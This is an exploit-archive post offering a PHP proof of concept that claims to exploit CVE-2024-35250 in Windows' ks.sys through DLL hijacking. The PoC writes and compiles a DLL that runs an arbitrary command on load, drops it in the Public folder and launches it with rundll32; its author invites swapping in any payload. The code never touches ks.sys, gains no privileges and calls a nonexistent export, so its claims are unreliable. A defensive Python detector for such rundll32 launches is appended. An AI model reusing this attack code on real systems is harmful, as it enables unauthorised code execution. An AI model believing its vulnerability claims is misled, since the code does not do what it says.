Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking

02 Dec 2025 00:00:00. Reported by indoushka. Type: packetstorm. Source: packetstorm.news

Privilege escalation on Windows via DLL hijacking in ks.sys driver (CVE-2024-35250) affecting Windows 10 and 11.

Code
    =============================================================================================================================================
    | # Title     : Microsoft Windows 10 Famille 10.0.19045.5487 (DLL Hijacking) Privilege Escalation                                           |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://www.Microsoft.com                                                                                                   |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking in Google or another search engine.
    
    [+] Code Description: The ks.sys driver on Microsoft Windows is one of the core components of Kernel Streaming and is installed by default. 
    
        There exists a local privilege escalation vulnerability in this driver that can be exploited on many recent versions of Windows 10, Windows 11 and Windows Server 2022.
    
    [+] What's new in this version?
    
        Added DLL Hijacking exploit inside the code
    	
        Create a malicious DLL library directly from inside the code
    
        Use rundll32.exe to automatically load the payload
    
        Ensure all possible environments are supported (Windows 10 and 11)
    
        Improved compatibility with different languages
    
        (Related: https://packetstorm.news/files/id/182984/ ; related CVE number: CVE-2024-35250).
    
    
    [+] Usage : php poc.php
    
    [+] PayLoad :
    
    <?php
    /**
     * Exploit for CVE-2024-35250 on Windows with support for all languages + DLL Hijacking
     */
    
    function getWindowsLCID() {
        $output = shell_exec('wmic os get locale /value');
        preg_match('/Locale=(\w+)/', $output, $matches); // wmic prints the LCID in hex, e.g. Locale=040c
        return isset($matches[1]) ? hexdec($matches[1]) : 1033; // fall back to en-US (1033) when wmic returns nothing
    }
    
    function localeToLanguage($locale) {
        $languages = [
            1033 => ['English', 'C:\\Users\\Public\\'], // en-US
            1036 => ['French', 'C:\\Utilisateurs\\Public\\'], // fr-FR
            3082 => ['Spanish', 'C:\\Usuarios\\Public\\'], // es-ES
            1046 => ['Portuguese', 'C:\\Usuários\\Public\\'], // pt-BR
            1031 => ['German', 'C:\\Benutzer\\Öffentlich\\'], // de-DE
            1049 => ['Russian', 'C:\\Пользователи\\Общие\\'], // ru-RU
            1056 => ['Persian', 'C:\\کاربران\\عمومی\\'], // fa-IR
            1025 => ['Arabic', 'C:\\المستخدمون\\عام\\'], // ar-SA
            1101 => ['Hindi', 'C:\\Users\\Public\\'], // hi-IN
            1114 => ['Aramaic', 'C:\\משתמשים\\ציבורי\\'], // Aramaic
            1037 => ['Hebrew', 'C:\\משתמשים\\ציבורי\\'], // he-IL
            2052 => ['Chinese (Simplified)', 'C:\\用户\\公共\\'], // zh-CN
            1028 => ['Chinese (Traditional)', 'C:\\使用者\\公用\\'], // zh-TW
            1041 => ['Japanese', 'C:\\ユーザー\\パブリック\\'], // ja-JP
            1042 => ['Korean', 'C:\\사용자\\공용\\'], // ko-KR
            1054 => ['Thai', 'C:\\ผู้ใช้\\สาธารณะ\\'], // th-TH
            1066 => ['Vietnamese', 'C:\\Người dùng\\Công cộng\\'], // vi-VN
        ];
    
        return $languages[$locale] ?? ['Unknown', 'C:\\Users\\Public\\']; // unknown LCID: default to the English path
    }
    
    function getPublicPath() {
        $locale = getWindowsLCID();
        list($lang, $path) = localeToLanguage($locale);
        echo "[+] لغة النظام: $lang (LCID: $locale)\n";
        return $path;
    }
    
    function is64BitWindows() {
        return (PHP_INT_SIZE === 8); // note: this tests the bitness of the PHP interpreter, not of Windows itself
    }
    
    function checkVulnerableDriver() {
        $winDir = getenv('WINDIR');
        $driverPath = $winDir . '\\system32\\drivers\\ks.sys';
    
        if (!file_exists($driverPath)) {
            die("[X] لم يتم العثور على ks.sys، النظام غير قابل للاستغلال.\n");
        }
    
        echo "[+] ks.sys موجود في المسار: $driverPath\n";
        return true;
    }
    
    function getWindowsBuildNumber() {
        $output = shell_exec('wmic os get BuildNumber /value');
        preg_match('/BuildNumber=(\d+)/', $output, $matches);
        return $matches[1] ?? null;
    }
    
    function isVulnerableVersion($buildNumber) {
        $vulnerableBuilds = range(14393, 19045); // Windows 10 1607 through Windows 10 22H2
        return in_array($buildNumber, $vulnerableBuilds);
    }
    
    function createMaliciousDLL($dllPath) {
        $dllCode = <<<EOD
    #include <windows.h>
    #include <stdlib.h>
    
    BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
        if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
            system("cmd.exe /c calc.exe"); // replace calc.exe with whatever payload you want to run
        }
        return TRUE;
    }
    EOD;
    
        file_put_contents("payload.c", $dllCode);
        shell_exec("gcc -shared -o $dllPath payload.c -mwindows"); // requires gcc (e.g. MinGW) on the PATH
    }
    
    function exploit() {
        if (!is64BitWindows()) {
            die("[X] النظام ليس 64 بت، الاستغلال غير ممكن.\n");
        }
    
        if (!checkVulnerableDriver()) {
            die("[X] لا يمكن متابعة الاستغلال.\n");
        }
    
        $buildNumber = getWindowsBuildNumber();
        if (!$buildNumber || !isVulnerableVersion($buildNumber)) {
            die("[X] إصدار Windows غير مدعوم: $buildNumber\n");
        }
    
        echo "[+] تم التحقق من الثغرة، سيتم تنفيذ الهجوم الآن...\n";
    
        $publicPath = getPublicPath();
        $payloadPath = $publicPath . "exploit_payload.dll";
    
        echo "[+] سيتم استخدام المسار: $payloadPath\n";
    
        createMaliciousDLL($payloadPath);
    
        echo "[+] تم إنشاء DLL الضارة بنجاح...\n";
    
        $notepad = shell_exec('start /B notepad.exe'); // launch notepad to host the DLL
        sleep(1);
    
        echo "[+] تم تشغيل Notepad، تنفيذ الحمولة...\n";
        shell_exec("rundll32 $payloadPath,Inject"); // load the payload via rundll32 (DllMain runs at load time; the DLL above exports no "Inject" entry point)
    }
    
    exploit();
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
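As an added defender-side example (not part of the packetstorm post or the PoC above): detection logic that flags rundll32 launches loading a DLL from one of the Public folders in the PoC's locale table, run over constructed Sysmon-style process-creation lines. The log format, the sample events and the function names are assumptions made for this example.

```python
import re

# Localized "Public" spellings from the PoC's locale table plus the canonical path.
# On a localized Windows the on-disk path is still C:\Users\Public (the translated
# names are shell display names), so real events usually carry the canonical form.
PUBLIC_DIRS = [
    r"c:\users\public", r"c:\utilisateurs\public", r"c:\usuarios\public",
    r"c:\usuários\public", r"c:\benutzer\öffentlich", r"c:\пользователи\общие",
    r"c:\کاربران\عمومی", r"c:\المستخدمون\عام", r"c:\משתמשים\ציבורי",
    r"c:\用户\公共", r"c:\使用者\公用", r"c:\ユーザー\パブリック",
    r"c:\사용자\공용", r"c:\ผู้ใช้\สาธารณะ", r"c:\người dùng\công cộng",
]

# Constructed Sysmon-style process-creation events (key=value, one per line).
SAMPLE_LOG = r"""
Image=C:\Windows\System32\rundll32.exe CommandLine="rundll32 C:\Utilisateurs\Public\exploit_payload.dll,Inject" ParentImage=C:\php\php.exe
Image=C:\Windows\System32\rundll32.exe CommandLine="rundll32.exe shell32.dll,Control_RunDLL" ParentImage=C:\Windows\explorer.exe
Image=C:\Windows\System32\rundll32.exe CommandLine="rundll32.exe C:\Users\Public\exploit_payload.dll,Inject" ParentImage=C:\Windows\System32\cmd.exe
Image=C:\Windows\System32\notepad.exe CommandLine="notepad.exe" ParentImage=C:\php\php.exe
"""

EVENT_RE = re.compile(r'Image=(?P<image>\S+)\s+CommandLine="(?P<cmd>[^"]*)"\s+ParentImage=(?P<parent>\S+)')
# rundll32[.exe] <dll>[,<entry>] ...: the DLL is the first argument, up to the comma.
RUNDLL_RE = re.compile(r'^\s*"?(?:[^\s"]*[\\/])?rundll32(?:\.exe)?"?\s+"?([^",]+)', re.I)

def rundll32_dll(cmdline):
    """Return the DLL path a rundll32 command line loads, or None if it is not rundll32."""
    m = RUNDLL_RE.match(cmdline)
    return m.group(1).strip() if m else None

def in_public_dir(path):
    """True when the path lies under one of the (localized) Public folders."""
    p = path.lower().replace("/", "\\")
    return any(p.startswith(d + "\\") for d in PUBLIC_DIRS)

def find_public_dir_rundll32(log_text):
    """Return (dll, parent_image) for every rundll32 event that loads a DLL from a Public folder."""
    hits = []
    for line in log_text.splitlines():
        m = EVENT_RE.search(line)
        if not m or not m.group("image").lower().endswith("\\rundll32.exe"):
            continue
        dll = rundll32_dll(m.group("cmd"))
        if dll and in_public_dir(dll):
            hits.append((dll, m.group("parent")))
    return hits

if __name__ == "__main__":
    for dll, parent in find_public_dir_rundll32(SAMPLE_LOG):
        print(f"[!] rundll32 loaded {dll} (parent: {parent})")
```

Only the two events that load exploit_payload.dll from a Public folder are reported; the shell32.dll control-panel launch and the notepad event are ignored.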


Vulners AI Score: 7.9 (High risk)
CVSS 3.1: 7.8
EPSS: 0.54913